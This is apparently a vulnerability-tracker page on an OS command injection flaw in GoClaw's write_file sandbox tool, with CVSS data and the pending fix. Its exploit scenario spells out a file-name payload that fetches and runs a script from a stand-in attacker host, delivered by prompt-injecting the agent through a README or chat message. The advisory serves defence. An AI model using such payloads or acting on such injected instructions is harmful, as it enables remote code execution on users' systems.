EUVD-2026-33540
GHSA-6jm8-4fhr-5w64
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionCVE.org
A vulnerability was found in nextlevelbuilder GoClaw up to 3.11.3. This impacts the function FsBridge.WriteFile of the file internal/sandbox/fsbridge.go of the component write_file Tool. Performing a manipulation results in os command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The pull request to fix this issue awaits acceptance.
AnalysisAI
OS command injection in nextlevelbuilder GoClaw through version 3.11.3 allows remote attackers to execute arbitrary shell commands inside the sandbox container by supplying a crafted file path to the write_file tool. The flaw exists in FsBridge.WriteFile (internal/sandbox/fsbridge.go), which interpolated the destination path into a shell command (sh -c "cat > <path>") executed via docker exec, letting shell metacharacters such as $(...) break out of the intended write operation. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the attacker can influence the `path` argument passed to GoClaw's write_file tool on a version up to 3.11.3 - typically by getting the agent to act on attacker-controlled instructions or content (prompt injection, malicious repository files, untrusted task input) such that a path string containing shell metacharacters like `$(...)` or backticks reaches FsBridge.WriteFile. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Signals are mixed and warrant prioritization above the raw CVSS number. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker seeds untrusted content the GoClaw agent will process - for example, a README, issue body, or chat message that instructs the agent to write a file at a path like `nested/evil$(curl attacker.tld/x.sh|sh);name.txt`. When the agent calls the write_file tool, FsBridge.WriteFile interpolates that path into `sh -c "cat > <path>"` inside the sandbox container, the shell evaluates the `$(...)` substitution, and arbitrary commands execute with the sandbox user's privileges. … |
| Remediation | Upstream fix available (PR/commit); released patched version not independently confirmed - the fix is in https://github.com/nextlevelbuilder/goclaw/pull/1155, which replaces the `sh -c "cat > <path>"` invocation with a direct `tee [-a] -- <resolved>` argv call so paths are never reparsed by a shell, but the PR description notes it awaits acceptance and no tagged release beyond 3.11.3 is referenced in the input data. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today